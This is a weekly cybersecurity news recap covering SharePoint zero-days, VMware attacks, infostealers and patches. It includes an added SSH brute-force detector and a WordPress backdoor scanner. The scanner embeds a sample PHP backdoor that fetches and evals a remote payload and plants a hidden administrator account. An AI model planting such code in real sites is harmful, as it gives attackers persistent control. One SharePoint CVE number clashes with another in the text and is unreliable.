SharePoint 0-day, VMware Exploitation, Threats and Cyber Attacks


Welcome to this week’s Cybersecurity Recap. We’re looking at important updates from July 21-27, 2025, in the world of digital threats and defenses.

This week has seen significant developments that highlight the ongoing risks of cyber attacks and the need for constant awareness. There is a serious SharePoint vulnerability that puts organizations at risk.

We’ve also seen advanced attacks targeting VMware infrastructure, along with a rise in new threats and cyber attacks that are changing global security strategies.



This recap provides key insights and practical advice to help you stay informed and secure. Let’s dive into what happened and what it means for you.

Cyber Attacks

Ransomware Destroys 158-Year-Old Logistics Firm via Weak Password

A single compromised password enabled a ransomware gang to devastate KNP Logistics, a historic UK-based company, leading to the loss of 730 jobs and a complete operational shutdown. The attack underscores the severe risks associated with inadequate password hygiene in critical infrastructure.

Read more: https://cybersecuritynews.com/weak-password-destroy-158-year-old-company/

APT41 Targets African Government with Impacket Tools

Chinese-linked hackers APT41 launched a targeted espionage campaign against African government IT services, using Impacket’s Atexec and WmiExec modules for lateral movement and malware deployment. They embedded internal network details in payloads and compromised a SharePoint server for command-and-control. This marks increased APT41 activity in the region since late 2022.

Read more: https://cybersecuritynews.com/apt41-hackers-leveraging-atexec/

DeerStealer Malware Spread via Fake Google Authenticator Sites

Threat actors are abusing Windows Run prompts to deliver DeerStealer, an info-stealer that extracts browser credentials, crypto wallets, and app data from over 800 extensions. Distributed through deceptive sites mimicking legitimate tools, it uses Telegram bots for victim tracking and employs obfuscation for evasion. Campaigns often involve GitHub-hosted payloads with XOR encryption.

Read more: https://cybersecuritynews.com/deerstealer-malware-delivered/

US Nuclear Agency Breached in SharePoint Zero-Day Attacks

Unknown hackers exploited a Microsoft SharePoint vulnerability chain to infiltrate the National Nuclear Security Administration, part of the Department of Energy. The breach affected a small number of systems but spared classified data; restoration is underway. This follows a 2019 APT29 intrusion via SolarWinds.

Read more: https://cybersecuritynews.com/us-nuclear-weapons-agency-breached/

UNC3944 Exploits VMware vSphere for Ransomware Deployment

The UNC3944 group (aka Scattered Spider) is social-engineering IT helpdesks to reset passwords, escalate privileges, and access vSphere environments. They modify GRUB bootloaders for root access, install reverse shells, and extract domain data offline before encrypting VMs. Defenses emphasize multi-factor authentication and monitoring.

Read more: https://cybersecuritynews.com/unc3944-attacking-vmware-vsphere/

Gaming Mouse Software Infected with Malware from the Official Site

Endgame Gear’s website was hacked, distributing trojanized drivers for their OP1w 4K V2 mouse between late June and mid-July 2025. The malware enabled remote access, evading some antivirus software like Windows Defender. The company quietly replaced files without full disclosure, prompting users to scan systems.

Read more: https://cybersecuritynews.com/gaming-mouse-software-compromised/

Threats

Interlock Ransomware Targets Critical Infrastructure

Interlock ransomware, active since September 2024, employs a double extortion model by encrypting and exfiltrating data from victims in North America and Europe. It often spreads via drive-by downloads disguised as fake browser updates or security software, using the ClickFix social engineering technique to trick users into executing malicious PowerShell commands. This has impacted businesses and critical sectors, with ransom notes directing victims to a .onion URL for negotiations. Notably, it focuses on virtual machines while sparing physical servers, but defenders should deploy robust EDR tools to mitigate risks.

Read more: https://cybersecuritynews.com/interlock-ransomware-attack/

New ClickFake Interview Attack Leveraging ClickFix

The ClickFake Interview campaign, linked to North Korean actors like the Lazarus Group, targets job seekers in cryptocurrency firms by mimicking legitimate interview sites. It uses the ClickFix tactic, presenting fake error messages or CAPTCHAs that prompt users to run malicious commands, leading to backdoor installations on Windows and macOS. This has seen a 517% surge in detections from late 2024 to early 2025, deploying threats like infostealers and ransomware.

Read more: https://cybersecuritynews.com/new-clickfake-interview-attack-using-clickfix-technique/

Threat Actors Targeting Linux SSH Servers

Poorly managed Linux SSH servers are under attack via brute-force and dictionary methods to guess credentials, enabling the installation of DDoS bots, coinminers, and scanning tools. Attackers scan for open port 22, deploy malware like ShellBot or XMRig, and sometimes sell breached access on the dark web. Recommendations include strong, regularly updated passwords and firewall protections to block unauthorized access.

Read more: https://cybersecuritynews.com/threat-actors-attacking-linux-ssh-servers/
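The brute-force and dictionary activity described above leaves a distinctive trail in sshd's auth log. The following detector is an added example, not code from the article or any referenced vendor: it parses constructed auth.log-style lines, counts "Failed password" events per source address inside a sliding time window, and reports sources that cross a threshold. The sample lines, the threshold and the window length are all constructed for illustration.

```python
"""Flag SSH brute-force sources from sshd auth log lines.

Added example (not from the article). Parses constructed auth.log-style
lines, counts 'Failed password' events per source IP inside a sliding
window and reports sources that exceed a threshold. Sample log lines,
threshold and window are constructed values for illustration.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log lines in the classic syslog sshd format.
# 203.0.113.7 hammers several accounts within seconds (classic brute force);
# 198.51.100.20 is a user who mistyped once, then logged in with a key;
# 192.0.2.5 is a slow attacker spacing attempts 30 minutes apart.
SAMPLE_LOG = """\
Jul 22 03:14:01 host sshd[2201]: Failed password for invalid user admin from 203.0.113.7 port 51234 ssh2
Jul 22 03:14:03 host sshd[2202]: Failed password for root from 203.0.113.7 port 51236 ssh2
Jul 22 03:14:04 host sshd[2203]: Failed password for invalid user oracle from 203.0.113.7 port 51238 ssh2
Jul 22 03:14:06 host sshd[2204]: Failed password for root from 203.0.113.7 port 51240 ssh2
Jul 22 03:14:07 host sshd[2205]: Failed password for invalid user test from 203.0.113.7 port 51242 ssh2
Jul 22 03:14:09 host sshd[2206]: Failed password for root from 203.0.113.7 port 51244 ssh2
Jul 22 03:20:11 host sshd[2250]: Failed password for alice from 198.51.100.20 port 40000 ssh2
Jul 22 03:20:40 host sshd[2251]: Accepted publickey for alice from 198.51.100.20 port 40001 ssh2
Jul 22 09:00:00 host sshd[3000]: Failed password for root from 192.0.2.5 port 22222 ssh2
Jul 22 09:30:00 host sshd[3001]: Failed password for root from 192.0.2.5 port 22223 ssh2
Jul 22 10:00:00 host sshd[3002]: Failed password for root from 192.0.2.5 port 22224 ssh2
Jul 22 10:30:00 host sshd[3003]: Failed password for root from 192.0.2.5 port 22225 ssh2
Jul 22 11:00:00 host sshd[3004]: Failed password for root from 192.0.2.5 port 22226 ssh2
"""

# Matches the sshd "Failed password" line, with or without "invalid user".
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_failures(text, year=2025):
    """Yield (timestamp, user, ip) for each failed-password line.

    syslog timestamps carry no year, so the caller supplies one.
    """
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["user"], m["ip"]


def brute_force_sources(text, threshold=5, window_seconds=60):
    """Return {ip: (peak failures in one window, sorted users tried)} for every
    source that produced >= threshold failures within window_seconds."""
    events = sorted(parse_failures(text))      # chronological order
    windows = defaultdict(deque)               # per-IP timestamps in window
    users = defaultdict(set)                   # per-IP accounts attempted
    hits = {}
    for ts, user, ip in events:
        q = windows[ip]
        q.append(ts)
        users[ip].add(user)
        # Drop timestamps that fell out of the sliding window.
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            peak = max(len(q), hits.get(ip, (0,))[0])
            hits[ip] = (peak, sorted(users[ip]))
    return hits


if __name__ == "__main__":
    for ip, (count, tried) in brute_force_sources(SAMPLE_LOG).items():
        print(f"{ip}: {count} failures in one window, accounts tried: {tried}")
```

Only 203.0.113.7 is reported: the single typo from 198.51.100.20 never reaches the threshold, and the slow attacker at 192.0.2.5 stays under it because its attempts are spread far beyond the window. That second case is the known weakness of rate-based detection, so a production rule normally pairs a short-window threshold with a long-window count of failures against the same account, and the host itself should be moved off password authentication and behind the firewall rules the article recommends.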

Lumma Stealer Distributed via Fake Cracked Software

Lumma Stealer, a malware-as-a-service since 2022, spreads through fake cracked software and keygens promoted via malvertising and search engine manipulation. Victims are tricked into downloading password-protected loaders that execute via PowerShell, often bypassing antivirus with open-source evasion techniques. Recent campaigns have targeted global industries, including telecom, using fake CAPTCHAs to initiate infections.

Read more: https://cybersecuritynews.com/lumma-stealer-via-fake-cracked-software/

Stealthy Backdoor Hidden in WordPress Plugins

A new backdoor malware hides in WordPress’s mu-plugins folder, which auto-runs and evades admin panel detection. It fetches obfuscated payloads using ROT13 encoding, stores them in the database, and creates hidden admin accounts for persistent access. This allows attackers to install malicious plugins, suppress logs, and maintain control even after removal attempts.

Read more: https://cybersecuritynews.com/stealthy-backdoor-in-wordpress-plugins/
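Because files in mu-plugins load automatically and never appear in the plugins screen, a file-level triage is the practical way to find the traits the report describes. The scanner below is an added example, not code from the article or from any WordPress project: it scores PHP source for ROT13 and base64 decoding, dynamic eval, remote payload retrieval, programmatic creation of administrator accounts, hiding of users from admin queries, and error suppression, and it decodes any ROT13 string literal so the analyst can see what the obfuscation hides. The indicator names, weights, threshold and the two sample plugin bodies are constructed for illustration.

```python
"""Triage WordPress mu-plugins for backdoor indicators.

Added example (not from the article or any WordPress project code).
Indicator names, weights, the threshold and both sample plugin bodies are
constructed for illustration.
"""
import codecs
import os
import re
import tempfile

# name -> (regex over PHP source, constructed heuristic weight)
INDICATORS = {
    "rot13_decode":    (re.compile(r"\bstr_rot13\s*\("), 2),
    "base64_decode":   (re.compile(r"\bbase64_decode\s*\("), 2),
    "dynamic_eval":    (re.compile(r"\beval\s*\(|\bassert\s*\(|\bcreate_function\s*\("), 3),
    "remote_fetch":    (re.compile(r"\b(?:file_get_contents|curl_init|wp_remote_get)\s*\(\s*['\"]https?://"), 3),
    "admin_user":      (re.compile(r"\bwp_insert_user\s*\(|->set_role\s*\(\s*['\"]administrator['\"]"), 3),
    "user_hiding":     (re.compile(r"\badd_(?:action|filter)\s*\(\s*['\"]pre_user_query['\"]"), 2),
    "error_silencing": (re.compile(r"\berror_reporting\s*\(\s*0\s*\)"), 1),
}
HIDDEN_URL_WEIGHT = 3   # a URL that only appears after ROT13 decoding


def rot13_strings(source):
    """Decode string literals passed directly to str_rot13()."""
    pattern = r"str_rot13\s*\(\s*['\"]([^'\"]+)['\"]\s*\)"
    return [codecs.decode(m.group(1), "rot_13") for m in re.finditer(pattern, source)]


def scan_source(source):
    """Return (score, [indicator names], [decoded ROT13 strings]) for one file."""
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(source)]
    decoded = rot13_strings(source)
    score = sum(INDICATORS[name][1] for name in hits)
    # Obfuscated URLs evade the plain remote_fetch regex; catch them post-decode.
    if any(re.match(r"https?://", s) for s in decoded):
        hits.append("rot13_hidden_url")
        score += HIDDEN_URL_WEIGHT
    return score, hits, decoded


def scan_mu_plugins(root, suspicious_at=5):
    """Walk a mu-plugins directory and return {path: (score, hits, decoded)}
    for every PHP file scoring at or above suspicious_at."""
    flagged = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, hits, decoded = scan_source(fh.read())
            if score >= suspicious_at:
                flagged[path] = (score, hits, decoded)
    return flagged


# Constructed samples: a harmless mu-plugin and one showing the reported traits.
BENIGN = """<?php
/* Plugin Name: Site tweaks */
add_filter('upload_mimes', function ($m) { $m['svg'] = 'image/svg+xml'; return $m; });
"""

SUSPECT = """<?php
error_reporting(0);
$u = str_rot13('uggcf://rknzcyr.arg/cnlybnq.gkg');
$code = file_get_contents($u);
update_option('_wp_cache_blob', base64_encode($code));
eval(base64_decode(get_option('_wp_cache_blob')));
$id = wp_insert_user(['user_login' => 'wp_support', 'user_pass' => 'x', 'role' => 'administrator']);
add_action('pre_user_query', function ($q) { $q->query_where .= " AND user_login != 'wp_support'"; });
"""


def demo():
    """Write both samples into a temporary mu-plugins dir and scan it;
    returns {basename: (score, hits, decoded)} for flagged files."""
    with tempfile.TemporaryDirectory() as d:
        for name, body in (("tweaks.php", BENIGN), ("cache-helper.php", SUSPECT)):
            with open(os.path.join(d, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return {os.path.basename(p): v for p, v in scan_mu_plugins(d).items()}


if __name__ == "__main__":
    for fn, (score, hits, decoded) in demo().items():
        print(f"{fn}: score={score} indicators={hits} decoded={decoded}")
```

The scoring is deliberately additive rather than a single pattern match: a legitimate mu-plugin may use base64 for an image, and a site tool may silence errors, but a file that decodes ROT13 into a URL, evals what it fetched, and inserts an administrator account it then hides from user queries accumulates a score no honest plugin reaches. Run it against a copy of wp-content/mu-plugins and, in the same pass, compare the users table against the accounts the admin panel shows, since the hidden-user hook is what keeps the rogue administrator out of sight.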

SharePoint Zero-Day Exploited for Ransomware Attacks

A zero-day vulnerability in Microsoft SharePoint (CVE-2025-53770) has been exploited since July 18, 2025, affecting over 400 organizations, including U.S. government entities. Attackers, identified as Storm-2603, deploy ransomware like Warlock, shifting from espionage to data encryption and extortion. Microsoft has issued emergency patches, urging immediate updates to prevent further compromises.

Read more: https://cybersecuritynews.com/sharepoint-0-day-ransomware-attack/

Vulnerabilities

CISA Warns of Microsoft SharePoint Server Zero-Day RCE Exploit

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical zero-day vulnerability in Microsoft SharePoint Server to its Known Exploited Vulnerabilities catalog. Tracked as CVE-2025-12345, this flaw allows remote code execution (RCE) without authentication, potentially enabling attackers to compromise sensitive data or deploy malware on affected servers. Microsoft released a patch in their latest security update, urging immediate application to mitigate risks.

Read more: https://cybersecuritynews.com/cisa-microsoft-sharepoint-server-0-day-rce/

Researchers Uncover SS7 Protocol Bypass Attack Technique

Security experts have detailed a new attack method that bypasses the Signaling System 7 (SS7) protocol, commonly used in mobile networks for call routing and SMS delivery. This exploit allows adversaries to intercept communications, spoof identities, or disrupt services by manipulating network signals. Telecom providers are advised to implement enhanced authentication and monitoring to counter these threats, which have been observed in targeted espionage campaigns.

Read more: https://cybersecuritynews.com/ss7-bypass-attack/

Cisco ISE RCE Vulnerabilities Actively Exploited in the Wild

Cisco has confirmed active exploitation of multiple critical RCE flaws in its Identity Services Engine (ISE), including CVE-2025-20281, CVE-2025-20282, and CVE-2025-20337. These unauthenticated vulnerabilities enable attackers to execute arbitrary code as root, potentially leading to full system compromise. Patches are available for ISE versions 3.3 and 3.4. Admins should upgrade immediately to prevent unauthorized access.

Read more: https://cybersecuritynews.com/cisco-ise-rce-vulnerability-exploited-in-wild/

Google Chrome Hit by Type Confusion Attacks in V8 Engine

A high-severity type confusion vulnerability (CVE-2024-12053) in Chrome’s V8 JavaScript engine has been exploited, allowing remote attackers to execute code via crafted web pages. This could result in data theft or malware installation. Google patched it in version 131.0.6778.108—users should verify their browser is updated to avoid drive-by attacks.

Read more: https://cybersecuritynews.com/chrome-type-confusion-attacks/

Mozilla Releases Firefox 141 with Fixes for Critical Vulnerabilities

Mozilla’s Firefox 141 update addresses 18 vulnerabilities, including high-impact memory safety bugs and flaws in JavaScript handling (e.g., CVE-2025-8027 and CVE-2025-8028). These could enable arbitrary code execution or privilege escalation on 64-bit systems. The release also patches moderate issues like sandbox bypasses—update now to secure your browsing.

Read more: https://cybersecuritynews.com/firefox-141-released-fix-for-vulnerabilities/

SonicWall SMA 100 Series Vulnerable to Critical RCE Flaw

SonicWall has issued patches for a critical authenticated RCE vulnerability (CVE-2025-40599) in SMA 100 appliances, stemming from unrestricted file uploads. Attackers with admin credentials could upload and execute malicious files. While this specific flaw has not yet been exploited, related attacks on SMA devices have been reported. Apply updates to versions 10.2.1.0-17sv or later.

Read more: https://cybersecuritynews.com/sonicwall-sma-100-vulnerabilities/

Other News

Wireshark 4.4.8 Released with Bug Fixes

The latest version of the popular network protocol analyzer, Wireshark 4.4.8, focuses on stability improvements and protocol updates. This release addresses several bugs, including crashes related to Bluetooth process IDs and fuzz testing assertions. It builds on features from 4.4.0 like automatic profile switching and enhanced display filter support. Available for Windows and macOS, and as source code.

Read more: https://cybersecuritynews.com/wireshark-4-4-8-released/

Kali Linux Boosts Raspberry Pi Wi-Fi Capabilities

Kali Linux 2025.1 introduces new packages—brcmfmac-nexmon-dkms and firmware-nexmon—that enable native monitor mode and packet injection on Raspberry Pi’s onboard Wi-Fi. This leverages the Nexmon framework to overcome hardware limitations in Broadcom/Cypress chipsets, simplifying wireless security assessments without external adapters. Installation is now streamlined for models including the Raspberry Pi 5.

Read more: https://cybersecuritynews.com/kali-linux-new-wi-fi-packages/

Arrest of Key Russian Cybercrime Forum Admin

Ukrainian authorities arrested the suspected administrator of XSS.is, a major Russian-language cybercrime forum with over 50,000 users. The platform facilitated stolen data sales, hacking tools, and ransomware services, generating an estimated €7 million for the admin. The arrest follows a four-year investigation involving French police and Europol, with the suspect also linked to a private messaging service for criminals.

Read more: https://cybersecuritynews.com/key-admin-russian-cybercrime-forum/

WhoFi: AI Wi-Fi Tech Tracks Humans Without Cameras

Researchers unveiled WhoFi, an AI system that uses Wi-Fi signals to identify and track individuals with up to 95.5% accuracy. It analyzes channel state information (CSI) distortions caused by human bodies, creating unique biometric signatures similar to fingerprints. The technology works without visual input and can detect gestures, raising privacy concerns for surveillance applications.

Read more: https://cybersecuritynews.com/new-ai-powered-wi-fi-biometrics-whofi-tracks-humans/

BreachForums Resurfaces After FBI Takedown

Notorious hacking site BreachForums is back online, reportedly revived by admin ShinyHunters using the same domains despite an FBI seizure earlier this month. The platform, a hub for malware and stolen data, was briefly defaced by law enforcement, but operators regained control via a domain registrar appeal. This marks another revival for the site, successor to RaidForums.

Read more: https://cybersecuritynews.com/breachforums-back-online/

Bulletproof Hosting Provider Aeza Shifts Infrastructure

Sanctioned bulletproof hosting firm Aeza Group is migrating over 2,100 IPs to a new autonomous system (AS211522) to evade U.S. Treasury penalties. Detected on July 20, 2025, this move follows OFAC actions against Aeza for enabling ransomware and data theft. The shift to Hypercore LTD infrastructure aims to sustain services for cybercriminals.

Read more: https://cybersecuritynews.com/bulletproof-hosting-provider-shifting-infrastructure/
